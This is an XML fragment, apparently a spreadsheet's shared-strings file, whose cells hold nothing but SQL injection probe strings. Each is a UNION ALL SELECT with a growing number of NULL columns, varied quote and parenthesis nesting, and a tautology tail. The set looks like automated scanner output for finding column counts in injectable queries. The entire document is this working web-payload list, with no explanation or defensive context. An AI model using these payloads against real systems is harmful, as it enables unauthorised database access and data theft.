    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "ZeYY" LIKE "ZeYY</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "SWCv" LIKE "SWCv</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "xNpH" LIKE "xNpH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "mEoY" LIKE "mEoY</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "WKTH" LIKE "WKTH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Hdpk" LIKE "Hdpk</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "sGYf" LIKE "sGYf</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "YMPO" LIKE "YMPO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "YmrI" LIKE "YmrI</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "ByTu" LIKE "ByTu</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "VOqQ" LIKE "VOqQ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "WJfH" LIKE "WJfH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "vDuz" LIKE "vDuz</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ssRN" LIKE "ssRN</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Rhpv" LIKE "Rhpv</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "MJpg" LIKE "MJpg</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Syfl" LIKE "Syfl</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "tQFB" LIKE "tQFB</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "iOWd" LIKE "iOWd</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "yJet" LIKE "yJet</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "IRaw" LIKE "IRaw</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "pixM" LIKE "pixM</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "jnOf" LIKE "jnOf</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "yKPY" LIKE "yKPY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Fkki" LIKE "Fkki</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "KNFa" LIKE "KNFa</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "qozt" LIKE "qozt</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "XRaz" LIKE "XRaz</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "oZxx" LIKE "oZxx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "HtdZ" LIKE "HtdZ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "cooT" LIKE "cooT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ktIY" LIKE "ktIY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "tCkc" LIKE "tCkc</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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( 5454 = 5454</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 5927 = 5927</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 9445 = 9445</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3913 = 3913</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2351 = 2351</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</si>
  <si>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( 4069 = 4069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</si>
  <si>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( 9819 = 9819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</si>
  <si>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( 2323 = 2323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</si>
  <si>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( 943 = 943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</si>
  <si>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( 5726 = 5726</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8112 = 8112</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  4896 = 4896</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  9805 = 9805</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1072 = 1072</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  3758 = 3758</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</si>
  <si>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9222 = 9222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</si>
  <si>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5204 = 5204</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</si>
  <si>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6417 = 6417</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</si>
  <si>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2491 = 2491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</si>
  <si>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2119 = 2119</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 2387 = 2387</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 1715 = 1715</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 1969 = 1969</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5536 = 5536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</si>
  <si>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( 9730 = 9730</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</si>
  <si>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( 1050 = 1050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</si>
  <si>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( 2428 = 2428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</si>
  <si>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( 2218 = 2218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</si>
  <si>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( 320 = 320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</si>
  <si>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( 9144 = 9144</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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'LKRe' = 'LKRe</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'KITn' = 'KITn</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'mxEP' = 'mxEP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'HsFW' = 'HsFW</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'NhPC' = 'NhPC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'bpFN' = 'bpFN</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'alfp' = 'alfp</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'iXac' = 'iXac</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'qMtk' = 'qMtk</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</si>
  <si>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'VJkQ' = 'VJkQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'KbqI' = 'KbqI</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'GCfA' = 'GCfA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'UKNt' = 'UKNt</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Bhmo' = 'Bhmo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'hFaw' = 'hFaw</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'ZwGU' = 'ZwGU</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'lFYo' = 'lFYo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'rlvA' = 'rlvA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</si>
  <si>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'FojQ' = 'FojQ</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</si>
  <si>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'gqBi' = 'gqBi</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'cSmo' = 'cSmo</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'PDnG' = 'PDnG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'SfMF' = 'SfMF</t>
  </si>
  <si>
